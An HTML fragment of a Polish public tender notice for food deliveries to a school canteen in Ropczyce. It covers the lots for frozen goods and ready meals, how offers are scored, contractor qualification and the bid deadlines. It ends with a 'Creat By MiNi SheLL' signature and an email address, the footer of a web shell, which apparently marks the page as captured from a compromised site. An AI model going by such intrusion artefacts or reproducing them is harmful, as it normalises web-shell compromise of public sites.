<h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach, tj. pieczywa, świeżych wyrobów piekarskich, różnych produktów spożywczych, produktów mleczarskich, jaj, produktów mięsne (mięso wieprzowe i wołowe), produktów mięsnych (drobiowych), warzyw i owoców świeżych, mrożonek, ryb, warzyw i owoców mrożonych, wyrobów garmażeryjnych. Przedmiot zamówienia obejmuje 9 części, które należy wykonać zgodnie z zapisami niniejszej specyfikacji. <br/>W formularzach cenowych znajdują się szczegółowe opisy przedmiotu zamówienia odpowiednio dla: część VIII- Mrożonki CPV 15331170-9 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331100-8 - Warzywa świeże lub mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zmawiający będzie się kierował następującym kryterium: <br/>1)	Kryterium: cena – 60 pkt,<br/>2)	Kryterium: termin realizacji dostaw po złożeniu zamówienia – 20 pkt<br/>3)	Kryterium: termin płatności wynagrodzenia – 20 pkt<br/>2.	Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie wyliczona wg wyliczenia matematycznego:<br/><br/>Kryterium nr C1: Cena -60 pkt<br/>	Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym.<br/><br/>	Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/> najniższa cena<br/>	najniższa cena C= ------------------------------------------x60<br/>cena oferty ocenianej<br/><br/>Kryterium nr 2 – T 1: Termin realizacji dostaw po złożeniu zamówienia - 20 pkt.<br/>	oceniane będzie następująco:<br/>1)	w przypadku zaoferowania terminu realizacji dostaw: do 3 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 0 punktów<br/>2)	w przypadku zaoferowania terminu realizacji dostaw: do 2 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 10 punktów<br/>3)	w przypadku zaoferowania terminu realizacji dostaw: do 1 dnia roboczego po złożeniu zamówienia– Wykonawca otrzyma 20 punktów.<br/><br/>	Kryterium nr 3 – T2: Termin płatności wynagrodzenia – 20 pkt. <br/>Oferta może otrzymać maksymalnie 20 pkt, przy czym: <br/>1)	Oferta z 7 dniowym terminem płatności od dnia doręczenia otrzyma 0 pkt <br/>2)	Oferta z 14 dniowym terminem płatności otrzyma 10 pkt <br/>3)	Oferta z 21 dniowym terminem płatności otrzyma 15 pkt <br/>4)	Oferta z 30 dniowym terminem płatności otrzyma 20 pkt <br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem: <br/>	P = C + T1 + T2<br/>	Gdzie: <br/>	P – łączna liczba punktów oferty ocenianej <br/>	C – liczba punktów uzyskanych w kryterium „Cena” <br/>T1 – liczba punktów uzyskanych w kryterium „Termin realizacji dostaw po złożeniu zamówienia”<br/>	T2 – liczba punktów uzyskanych w kryterium „Termin płatności wynagrodzenia”<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium ceny C1 (maksymalnie 60,00 pkt), kryterium terminu płatności wynagrodzenia – T1 (maksymalnie 20,00 pkt):, kryterium- czas podstawienia pojazdu zastępczego – T2 (maksymalnie 20,00 pkt) P = C1 + T1+T2.<br/><br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tj. taką, która uzyska łącznie najwyższą ilość punktów w wyniku zsumowania punktów przyznanych <br/>w poszczególnych kryteriach.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności fatury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej w Zespole Szkół Nr 5 w Ropczycach, tj. pieczywa, świeżych wyrobów piekarskich, różnych produktów spożywczych, produktów mleczarskich, jaj, produktów mięsne (mięso wieprzowe i wołowe), produktów mięsnych (drobiowych), warzyw i owoców świeżych, mrożonek, ryb, warzyw i owoców mrożonych, wyrobów garmażeryjnych. Przedmiot zamówienia obejmuje 9 części, które należy wykonać zgodnie z zapisami niniejszej specyfikacji. <br/>W formularzach cenowych znajdują się szczegółowe opisy przedmiotu zamówienia odpowiednio dla: części nr IX Wyroby garmażeryjne – CPV 15894300-4. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15894300-4 - Dania gotowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zmawiający będzie się kierował następującym kryterium: <br/>1)	Kryterium: cena – 60 pkt,<br/>2)	Kryterium: termin realizacji dostaw po złożeniu zamówienia – 20 pkt<br/>3)	Kryterium: termin płatności wynagrodzenia – 20 pkt<br/>2.	Ocena ofert w zakresie przedstawionych wyżej kryteriów zostanie wyliczona wg wyliczenia matematycznego:<br/><br/>Kryterium nr C1: Cena -60 pkt<br/>	Kryterium „Cena” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu ofertowym.<br/><br/>	Zamawiający ofercie o najniższej cenie przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru:<br/><br/> najniższa cena<br/>	najniższa cena C= ------------------------------------------x60<br/>cena oferty ocenianej<br/><br/>Kryterium nr 2 – T 1: Termin realizacji dostaw po złożeniu zamówienia - 20 pkt.<br/>	oceniane będzie następująco:<br/>1)	w przypadku zaoferowania terminu realizacji dostaw: do 3 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 0 punktów<br/>2)	w przypadku zaoferowania terminu realizacji dostaw: do 2 dni roboczych po złożeniu zamówienia– Wykonawca otrzyma 10 punktów<br/>3)	w przypadku zaoferowania terminu realizacji dostaw: do 1 dnia roboczego po złożeniu zamówienia– Wykonawca otrzyma 20 punktów.<br/><br/>	Kryterium nr 3 – T2: Termin płatności wynagrodzenia – 20 pkt. <br/>Oferta może otrzymać maksymalnie 20 pkt, przy czym: <br/>1)	Oferta z 7 dniowym terminem płatności od dnia doręczenia otrzyma 0 pkt <br/>2)	Oferta z 14 dniowym terminem płatności otrzyma 10 pkt <br/>3)	Oferta z 21 dniowym terminem płatności otrzyma 15 pkt <br/>4)	Oferta z 30 dniowym terminem płatności otrzyma 20 pkt <br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem: <br/>	P = C + T1 + T2<br/>	Gdzie: <br/>	P – łączna liczba punktów oferty ocenianej <br/>	C – liczba punktów uzyskanych w kryterium „Cena” <br/>T1 – liczba punktów uzyskanych w kryterium „Termin realizacji dostaw po złożeniu zamówienia”<br/>	T2 – liczba punktów uzyskanych w kryterium „Termin płatności wynagrodzenia”<br/><br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium ceny C1 (maksymalnie 60,00 pkt), kryterium terminu płatności wynagrodzenia – T1 (maksymalnie 20,00 pkt):, kryterium- czas podstawienia pojazdu zastępczego – T2 (maksymalnie 20,00 pkt) P = C1 + T1+T2.<br/><br/>Spośród ofert, które nie zostaną odrzucone Zamawiający wybierze ofertę najkorzystniejszą, tj. taką, która uzyska łącznie najwyższą ilość punktów w wyniku zsumowania punktów przyznanych <br/>w poszczególnych kryteriach.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności fatury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu<br/>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1) nie podlegają wykluczeniu na zasadach określonych przez Zamawiającego <br/>w Rozdziale X niniejszego SWZ,<br/>2)	spełniają warunki udziału w postępowaniu określone przez Zamawiającego. <br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w tym zakresie; <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to <br/>z odrębnych przepisów<br/>Zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony jeżeli Wykonawca potwierdzi spełnianie tego warunku składając odpowiednie oświadczenie.<br/>3)	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony jeżeli Wykonawca potwierdzi spełnianie tego warunku składając odpowiednie oświadczenie.<br/>4)	zdolność technicznej lub zawodowej<br/>Zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony jeżeli Wykonawca potwierdzi spełnianie tego warunku składając odpowiednie oświadczenie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zgodnie z art. 125 ust. 1 Pzp do oferty każdy Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – wg wzoru stanowiącego załącznik nr 2 do SWZ. <br/>2.	Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, o tym że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>1)	wykonawcy. <br/>2)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w ust. 4 pkt 2, zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. <br/>3.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych jeżeli: <br/>1)	może je uzyskać za pomocą bezpłatnych lub ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał <br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, dane umożliwiające dostęp do tych środków, <br/>2)	podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust 1 PZP. <br/>4.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeśli Wykonawca wskaże te środki oraz potwierdzi ich prawdziwość <br/>i aktualność. <br/>5.	W zakresie nieuregulowanym PZP lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy Rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, których może żądać Zamawiający od Wykonawcy oraz Rozporządzenia Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenia zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich <br/>w postepowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w rozdz. XII ust. 1 niniejszego SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu <br/>w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postepowaniu lub kryteriów selekcji. <br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, zgodnie z §9 projektu umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/jo.ropczyce</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-05 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com